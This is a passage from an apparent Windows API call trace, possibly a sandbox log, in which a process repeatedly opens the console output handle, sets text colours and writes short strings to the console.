dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.676] GetLastError () returned 0xcb [0152.676] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.676] GetLastError () returned 0xcb [0152.676] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0152.676] GetLastError () returned 0xcb [0152.676] CloseHandle (hObject=0x3b) returned 1 [0152.676] GetLastError () returned 0xcb [0152.680] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.680] GetLastError () returned 0xcb [0152.680] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0152.681] GetLastError () returned 0xcb [0152.681] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0152.681] GetLastError () returned 0xcb [0152.681] CloseHandle (hObject=0x3b) returned 1 [0152.681] GetLastError () returned 0xcb [0152.684] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.684] GetLastError () returned 0xcb [0152.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.685] GetLastError () returned 0xcb [0152.685] GetConsoleOutputCP () returned 0x1b5 [0152.685] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.685] GetLastError () returned 0xcb [0152.688] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0152.697] GetLastError () returned 0xcb [0152.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.697] GetLastError () returned 0xcb [0152.700] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0152.700] GetLastError () returned 0xcb [0152.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.701] GetLastError () returned 0xcb [0152.705] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.705] GetLastError () returned 0xcb [0152.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.705] GetLastError () returned 0xcb [0152.705] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0152.705] GetLastError () returned 0xcb [0152.705] CloseHandle (hObject=0x47) returned 1 [0152.705] GetLastError () returned 0xcb [0152.709] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.710] GetLastError () returned 0xcb [0152.710] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.710] GetLastError () returned 0xcb [0152.710] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0152.710] GetLastError () returned 0xcb [0152.710] CloseHandle (hObject=0x47) returned 1 [0152.711] GetLastError () returned 0xcb [0152.715] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.754] GetLastError () returned 0xcb [0152.754] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0152.754] GetLastError () returned 0xcb [0152.754] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2e9aa2c*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9aa2c*, lpNumberOfCharsWritten=0x5d8ea3c*=0x11) returned 1 [0152.755] GetLastError () returned 0xcb [0152.755] CloseHandle (hObject=0x47) returned 1 [0152.755] GetLastError () returned 0xcb [0152.760] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.760] GetLastError () returned 0xcb [0152.760] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.760] GetLastError () returned 0xcb [0152.761] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0152.761] GetLastError () returned 0xcb [0152.761] CloseHandle (hObject=0x47) returned 1 [0152.761] GetLastError () returned 0xcb [0152.766] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.766] GetLastError () returned 0xcb [0152.766] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.767] GetLastError () returned 0xcb [0152.767] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0152.767] GetLastError () returned 0xcb [0152.767] CloseHandle (hObject=0x47) returned 1 [0152.767] GetLastError () returned 0xcb [0152.772] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.772] GetLastError () returned 0xcb [0152.772] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0152.773] GetLastError () returned 0xcb [0152.773] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0152.773] GetLastError () returned 0xcb [0152.773] CloseHandle (hObject=0x47) returned 1 [0152.773] GetLastError () returned 0xcb [0152.777] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0152.778] GetLastError () returned 0xcb [0152.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.778] GetLastError () returned 0xcb [0152.778] GetConsoleOutputCP () returned 0x1b5 [0152.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.778] GetLastError () returned 0xcb [0152.782] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0152.783] GetLastError () returned 0xcb [0152.783] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.783] GetLastError () returned 0xcb [0152.787] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0152.787] GetLastError () returned 0xcb [0152.787] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.787] GetLastError () returned 0xcb [0152.791] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.830] GetLastError () returned 0xcb [0152.830] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.830] GetLastError () returned 0xcb [0152.830] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0152.830] GetLastError () returned 0xcb [0152.830] CloseHandle (hObject=0x53) returned 1 [0152.830] GetLastError () returned 0xcb [0152.834] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.834] GetLastError () returned 0xcb [0152.834] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.835] GetLastError () returned 0xcb [0152.835] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0152.835] GetLastError () returned 0xcb [0152.835] CloseHandle (hObject=0x53) returned 1 [0152.835] GetLastError () returned 0xcb [0152.840] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.840] GetLastError () returned 0xcb [0152.840] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0152.840] GetLastError () returned 0xcb [0152.840] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2e9ada4*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9ada4*, lpNumberOfCharsWritten=0x5d8ea3c*=0x39) returned 1 [0152.840] GetLastError () returned 0xcb [0152.841] CloseHandle (hObject=0x53) returned 1 [0152.841] GetLastError () returned 0xcb [0152.845] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.846] GetLastError () returned 0xcb [0152.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.846] GetLastError () returned 0xcb [0152.846] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0152.846] GetLastError () returned 0xcb [0152.846] CloseHandle (hObject=0x53) returned 1 [0152.847] GetLastError () returned 0xcb [0152.851] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.851] GetLastError () returned 0xcb [0152.851] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.851] GetLastError () returned 0xcb [0152.851] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0152.851] GetLastError () returned 0xcb [0152.851] CloseHandle (hObject=0x53) returned 1 [0152.851] GetLastError () returned 0xcb [0152.857] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.857] GetLastError () returned 0xcb [0152.857] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0152.857] GetLastError () returned 0xcb [0152.857] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0152.858] GetLastError () returned 0xcb [0152.858] CloseHandle (hObject=0x53) returned 1 [0152.858] GetLastError () returned 0xcb [0152.863] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.863] GetLastError () returned 0xcb [0152.863] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.863] GetLastError () returned 0xcb [0152.863] GetConsoleOutputCP () returned 0x1b5 [0152.863] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.863] GetLastError () returned 0xcb [0152.867] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0152.906] GetLastError () returned 0xcb [0152.906] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.906] GetLastError () returned 0xcb [0152.909] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0152.910] GetLastError () returned 0xcb [0152.910] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.910] GetLastError () returned 0xcb [0152.913] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.913] GetLastError () returned 0xcb [0152.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.913] GetLastError () returned 0xcb [0152.913] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0152.914] GetLastError () returned 0xcb [0152.914] CloseHandle (hObject=0x5f) returned 1 [0152.914] GetLastError () returned 0xcb [0152.917] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.917] GetLastError () returned 0xcb [0152.917] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.918] GetLastError () returned 0xcb [0152.918] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0152.918] GetLastError () returned 0xcb [0152.918] CloseHandle (hObject=0x5f) returned 1 [0152.918] GetLastError () returned 0xcb [0152.921] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.922] GetLastError () returned 0xcb [0152.922] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0152.922] GetLastError () returned 0xcb [0152.922] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2e9b290*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9b290*, lpNumberOfCharsWritten=0x5d8ea3c*=0x4f) returned 1 [0152.922] GetLastError () returned 0xcb [0152.922] CloseHandle (hObject=0x5f) returned 1 [0152.922] GetLastError () returned 0xcb [0152.927] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.927] GetLastError () returned 0xcb [0152.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.927] GetLastError () returned 0xcb [0152.927] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0152.927] GetLastError () returned 0xcb [0152.927] CloseHandle (hObject=0x5f) returned 1 [0152.928] GetLastError () returned 0xcb [0152.932] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.932] GetLastError () returned 0xcb [0152.932] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.933] GetLastError () returned 0xcb [0152.933] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0152.933] GetLastError () returned 0xcb [0152.933] CloseHandle (hObject=0x5f) returned 1 [0152.933] GetLastError () returned 0xcb [0152.937] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.937] GetLastError () returned 0xcb [0152.937] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0152.937] GetLastError () returned 0xcb [0152.937] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0152.937] GetLastError () returned 0xcb [0152.938] CloseHandle (hObject=0x5f) returned 1 [0152.938] GetLastError () returned 0xcb [0152.941] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.941] GetLastError () returned 0xcb [0152.941] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.981] GetLastError () returned 0xcb [0152.981] GetConsoleOutputCP () returned 0x1b5 [0152.981] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.981] GetLastError () returned 0xcb [0152.985] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0152.985] GetLastError () returned 0xcb [0152.985] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.986] GetLastError () returned 0xcb [0152.990] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0152.990] GetLastError () returned 0xcb [0152.990] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.990] GetLastError () returned 0xcb [0152.995] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0152.995] GetLastError () returned 0xcb [0152.995] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.995] GetLastError () returned 0xcb [0152.995] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0152.995] GetLastError () returned 0xcb [0152.995] CloseHandle (hObject=0x6b) returned 1 [0152.996] GetLastError () returned 0xcb [0153.000] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.000] GetLastError () returned 0xcb [0153.000] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0153.001] GetLastError () returned 0xcb [0153.001] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0153.001] GetLastError () returned 0xcb [0153.001] CloseHandle (hObject=0x6b) returned 1 [0153.001] GetLastError () returned 0xcb [0153.006] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.006] GetLastError () returned 0xcb [0153.006] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0153.006] GetLastError () returned 0xcb [0153.006] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2e9b76c*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9b76c*, lpNumberOfCharsWritten=0x5d8ea3c*=0x19) returned 1 [0153.006] GetLastError () returned 0xcb [0153.006] CloseHandle (hObject=0x6b) returned 1 [0153.007] GetLastError () returned 0xcb [0153.011] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.011] GetLastError () returned 0xcb [0153.011] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0153.012] GetLastError () returned 0xcb [0153.012] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0153.012] GetLastError () returned 0xcb [0153.012] CloseHandle (hObject=0x6b) returned 1 [0153.012] GetLastError () returned 0xcb [0153.017] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.054] GetLastError () returned 0xcb [0153.055] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0153.055] GetLastError () returned 0xcb [0153.055] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0153.055] GetLastError () returned 0xcb [0153.055] CloseHandle (hObject=0x6b) returned 1 [0153.055] GetLastError () returned 0xcb [0153.060] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.061] GetLastError () returned 0xcb [0153.061] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0153.061] GetLastError () returned 0xcb [0153.061] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0153.061] GetLastError () returned 0xcb [0153.061] CloseHandle (hObject=0x6b) returned 1 [0153.062] GetLastError () returned 0xcb [0153.067] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.067] GetLastError () returned 0xcb [0153.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0153.067] GetLastError () returned 0xcb [0153.067] GetConsoleOutputCP () returned 0x1b5 [0153.067] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0153.067] GetLastError () returned 0xcb [0153.072] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0153.072] GetLastError () returned 0xcb [0153.072] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0153.073] GetLastError () returned 0xcb [0153.077] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0153.077] GetLastError () returned 0xcb [0153.077] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: 